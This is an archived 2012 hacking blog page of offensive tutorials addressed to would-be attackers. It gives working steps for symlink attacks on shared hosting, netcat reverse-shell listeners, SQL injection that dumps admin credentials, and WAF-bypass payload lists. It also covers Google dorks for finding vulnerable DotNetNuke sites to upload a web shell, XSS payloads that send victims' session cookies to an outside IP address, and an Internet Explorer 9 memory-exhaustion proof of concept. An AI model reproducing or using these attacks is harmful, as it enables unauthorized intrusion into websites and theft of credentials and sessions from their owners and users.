November 2012

Wednesday 28 November 2012

Vulnerability

SYMLINK Tutorial

Ajith KP November 28, 2012

SYMLINK is a type of attack which helps hacker to access directories of another websites in same server.

Needed

SYMLINK Shell --> here

Steps in image

I have noticed some one copying contents without giving a single credits. Please donot do this...

I haven't explained anything... Eventhogh from images you can prdict whats going on...
Please write comments and share with your hacker friends...

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< 0x4j17# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Monday 26 November 2012

Vulnerability

SYMLINKER

Ajith KP November 26, 2012

I have coded a simple automated SYMLINKER with very few function. Symlink is a type of attack which the attacker gets unauthorized access to other website's directories in same server.

Download from here.

Thursday 22 November 2012

Vulnerability

Reverse Connection using NetCat

Ajith KP November 22, 2012

Netcat is a hacking tool which is used to accept reverse connection and tunneling.[weavely tunneling: here]

Needed

Reverse connecting PHP application [here or use your fav. shell with reverse connecting funct.]
NetCat

Here I'm not going to r00t this server. Just pWning reverse connection.

Here I have successfully created a reverse connection to my port 443 [you can use unreserved ports]

Now open traditional NetCat[in Linux].

Become super user and execute command "nc -l -p 443"

Linux NetCat

Windows NetCat

Hope your further visits,,, Share if you like this...

Friday 9 November 2012

Vulnerability

Adobe Reader X/XI zero-day flaw found by Group-IB

Ajith KP November 09, 2012

Cyber crime investigation company Group-IB [Russia] has discovered a zero-day Adobe Reader X and XI exploit that is immune to the program's new Protected Mode.

The exploit is now use in private modified version of BlackHole Exploit Kit.

Please view the video posted by the Group-IB.

Share this new treat in cyber world and alert your friends.

Vulnerability

SQLi - Tutorial Part 2 [BOOLEAN BASED]

Ajith KP November 09, 2012

SQLi part 1 : http://terminalcoders.blogspot.in/2012/11/sql-injection-tutorial-for-beginners.html

READ New Part

Counting Total Column

"+ORDER+BY+1--" --> No Error
"+ORDER+BY+2--" --> No Error
"+ORDER+BY+3--" --> No Error
"+ORDER+BY+4--" --> No Error
"+ORDER+BY+5--" --> No Error
"+ORDER+BY+6--" --> Error

Total Column number=5.

Finding vulnerable column

"+union+select+1,2,3,4,5--" --> Nothing Happend.

But nothing happen in this session. Error message "different number of columns"

So I add an error function "AND+1=2" in URL.

"+and+1=2+union+select1,2,3,4,5--"

Now OK vulnerable column is 2.

This type of SQL Injection is called "BOOLEAN BASED" SQLi.

<<<<<<<<<<<<<<<<<<--------------- SHARE WITH FRIENDS ---------------->>>>>>>>>>>>>>>>

Thursday 8 November 2012

Programming Languages Theory

Palindrome Checker in C

Ajith KP November 08, 2012

Its a BCA practical examination question.

Like us in FACEBOOK: http://facebook.com/terminalcoders

_________________________________________________________________________

Wednesday 7 November 2012

XSS

XSS ---> Theft Session Cookies Full Tutorial

Ajith KP November 07, 2012

XSS / CSS stands for Cross Site Scripting.
XSS is used to client side attacks. It helps us to client side deface and theft session cookies.

Finding XSS vulnerability:

search.php?q=<script>alert("Ajithkp560 was Here")</script>
search.php?q=<script>alert("Ajithkp560 was Here");</script>
search.php?q=alert%28%5C%22Ajithkp560%20was%20Here%5C%22%29%3C%2Fscript%3E
search.php?q=%3Cscript%3Ealert%28%5C%22Ajithkp560%20was%20Here%5C%22%29%3B%3C%2Fscript%3E
search.php?q=';%20alert("Ajithkp560%20was%20here%20%3Ap");%20'

search.php?q=”><script>alert("Ajithkp560 was here")%3B<%2Fscript>

Look above image... This is called client side deface.

Now lets dig session cookies.

Lets alert(document.cookie)

Now we can redirect victim to our malicious PHP application. Here I'm using the PHP file stored in my personal server.

Download malicious PHP application from: http://ajithkp560.hostei.com/php/xss

1. search.php?q=<script>location.href='http://49.200.141.215/xss.php?cookie='+document.cookie;</script>
2. search.php?q=<script>window.location='http://49.200.141.215/xss.php?cookie='+document.cookie;</script>
3. search.php?q=<script>document.location='http://49.200.141.215/xss.php?cookie='+document.cookie;</script>

JavaScript to redirect to my malicious PHP file

Redirected to my Malicious PHP file

Now folks check out my directory which stored xss.php.

Now lets open "configurations.txt".

Some tricks, tools and abilities you needed

Firefox
Firefox addons cookies manager+ [for edit value of cookies in your firefox browser]
High talent in social engineering
Some known tricks like "Shorting URL[eg. http://cjb.net]", Hexing URL, etc.

Dedicated to OPENFIRE Members... ALEX Thanks for remember me about this...

<<<<<<<<<<<<<<<<<<<<<<<<<<<<Comments Please>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>Share with friends<<<<<<<<<<<<<<<<<<<<<<<<<<<<
<<<<<<<<<<<<<<<<<<<<<<<<Don't click unkown links>>>>>>>>>>>>>>>>>>>>>>>>>>

Vulnerability

WAF Bypass for beginners

Ajith KP November 07, 2012

WAF Bypass is for bypass 403 Forbidden. WAF stands for Web Application Firewall.

Look above image. We didn't successfully executed "union+select 1,2,3,4,5,6,7,8--".

Here we use advanced tricks in SQL injection. It is called WAF bypass.

Here one of the example of WAF Bypass,

"union(select 1,2,3,4,5,6,7,8)--"

Look above picture I have successfully executed SQL fuction.

Some Cheat Sheet for WAF Bypass on "UNION SELECT"

"UnioN SelecT" -->[Intermix of Capital and small letters]
"/*!Union*/ /*SelecT*/" -->[For the persons who know SQL understand it /*!comment syntax*/]
"UNIunionON+SELselectECT" -->[For Bypass firewall from remove of UNION SELECT from URL]
"%55nion %53elect" -->[%55=U and %53=S]
"%23ajithkp560%0aUnIOn%23ajithkp560%0aSeLecT" -->[%23 = #, single line comment, and %0a = New line]
"/*&id=*/union/*&id=*/select/*&id=*/" -->[Unwanted Comments]

Monday 5 November 2012

Vulnerability

DNN Hacking for beginners

Ajith KP November 05, 2012

DNN stands for Dot Net Nuke. It have an Remote Arbitrary File Upload vulnerability. Simply said uploading vulnerability.

Finding vulnerable websites

Find vulnerable websites by GOOGLE dorks:

inurl:/fck/fcklinkgallery.aspx
inurl:/tabid/36/language/en-US/Default.aspx

I got a target,

Select "File" from list.

The in URL bar paste the JavaScript: javascript:__doPostBack('ctlURL$cmdUpload','')

Now there appear a UPLOADING bar on page.

Now upload your ASP shell as "shell.asp;.txt, shell.asp;.jpg,etc"

Your uploads will go to "http://www.site.com/Portals/0/shell.asp;.txt"
<<<<<<<<<<<<<<<<--------------------HOPE YOUR COMMENT---------------------->>>>>>>>>>>

Sunday 4 November 2012

Vulnerability

SQL Injection tutorial for beginners

Ajith KP November 04, 2012

SQLi is the hacking way to dump database of website.
It is old trick, even though now too many websites are vulnerable to SQLi.

TUTORIAL FOR BEGINNERS

How to find SQLi vulnerability [Google Dorks]: http://pastebin.com/XKttipka

Finding vulnerability:

I got a link with URL http://www.ajithkp560.com/index.php?id=10

Now add a " ' " at the end of URL. That is http://www.ajithkp560.com/index.php?id=10'

If you get error message the website is vulnerable to SQLi

Finding total columns number

Finding columns by "order by"function

http://www.ajithkp560.com/index.php?id=10+order+by+1-- --> No error

http://www.ajithkp560.com/index.php?id=10+order+by+2-- --> No error

http://www.ajithkp560.com/index.php?id=10+order+by+3-- --> No error

...

http://www.ajithkp560.com/index.php?id=10+order+by+10-- --> Error

From the error we can understand there are 9 columns.

Finding vulnerable column

Vulnerable column can be find out by union+select+1,2,3,...,TotalNumberOfColumns--

ie, http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,3,4,5,6,7,8,9--

**id=-10 is used for find the vulnerable column.

we can find SQL version by http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,@@version,4,5,6,7,8,9--

After find vulnerable column we want to grab all tables in DB[Data Base].

For this we can use the bellow fuction.

We can grab tables by bellow function,

http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables--

Next grab columns from table. We need to encode the table name to Hexa Decimal.

I'm going to encode table usuarios_adm to hexa decimal.
Encode it from here http://ajithkp560.hostei.com/online_tools/hexatool.php.
usuarios_adm=7573756172696f735f61646d

Now the URL becomes http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x7573756172696f735f61646d--

** 0xHexValue --> 0x is preprocessing command to understand it is an HexaDecimal encode.

Dumping Data from column

Dumping data from by,
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(column_name_1,0x3a, column_name_2,0x3a,....column_name_n,0x3b),4,5,6,7,8,9+from+table_name_xxx--

I have dumped the data here by,
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(user,0x3a,pass,0x3a,email,0x3b),4,5,6,7,8,9+from+usuarios_adm--

------------------------->>>>>>>>>>>>>Write Your Comments<<<<<<<<<<<<<<---------------------------

Saturday 3 November 2012

Vulnerability

IE9 Memory Corruption Attack

Ajith KP November 03, 2012

Internet Explorer is vulnerable to many attacks. Memory corruption vulnerability have found many times in Internet Explorer. Before this, CSS based memory corruption found in Internet Explorer.

Metasploit Module for CSS memory corruption attack: http://www.metasploit.com/modules/exploit/windows/browser/ms11_003_ie_css_import [IE 6,7,8]

Here I would like to introduce IE9 's memory corruption attack.

Save the bellow PHP code:

<?php

/**********************************************************
 *   Internet Explorer 9 Memory Corruption PoC Exploit    *
 **********************************************************
 *                                                        *
 * Successfully executed with IE9 version 9.0.8112.16421  *
 *                                                        *
 * Discovered by Jean Pascal Pereira <pereira@secbiz.de>  *
 *                                                        *
 **********************************************************/

set_time_limit(0);

ini_set('memory_limit', '300M');

if(!file_exists("junk.htm"))
{
  $string = "<span id='";
  
  for($i = 0; $i < 24117256; $i++)
  {
    $string .= "\x90";
  }
  $string .= "'></span>";
  
  file_put_contents("junk.htm", $string);
}

print "View the sourcecode of the iframe below (right click -> view source): <br />\n";
print "<iframe style='width: 800px; height: 500px;' src='junk.htm'>\n";

for($i = 0; $i < 60; $i++)
{
  print "<iframe style='display:none' src='junk.htm'>\n";
}

/* http://0xffe4.org */

Save it as any name you like, but extension must be php. Open it in your Internet Explorer.

I opened IE9 browser. Memory usage is only 25,862K.

Now I opened the PHP file saved in my LOCALHOST. 30 Seconds after opened PHP file in my browser. OMG 1,016,240K memory usage :o

----------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------

<-------------------------------------------------Hope You Like This Post--------------------------------------------->
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Hope Your Comments<<<<<<<<<<<<<<<<<<<<<<<<<<<
------------------------------------------------->Share With Your Friends<----------------------------------------------

Vulnerability

WEBSPLOIT --> Another AutopWner

Ajith KP November 03, 2012

WEBSPLOIT is an autopWner like Metaploit.
Websploit is programmed in python and uses Python & Ruby modules.

Commands        Description
---------------           ----------------
set                     Set Value Of Options To Modules
scan                  Scan Wifi (Wireless Modules)
stop                   Stop Attack & Scan (Wireless Modules)
run                    Execute Module
use                    Select Module For Use
os                      Run Linux Commands(ex : os ifconfig)
back                  Exit Current Module
show modules   Show Modules of Current Database
show options     Show Current Options Of Selected Module
upgrade             Get New Version
update               Update Websploit Framework
about                 About US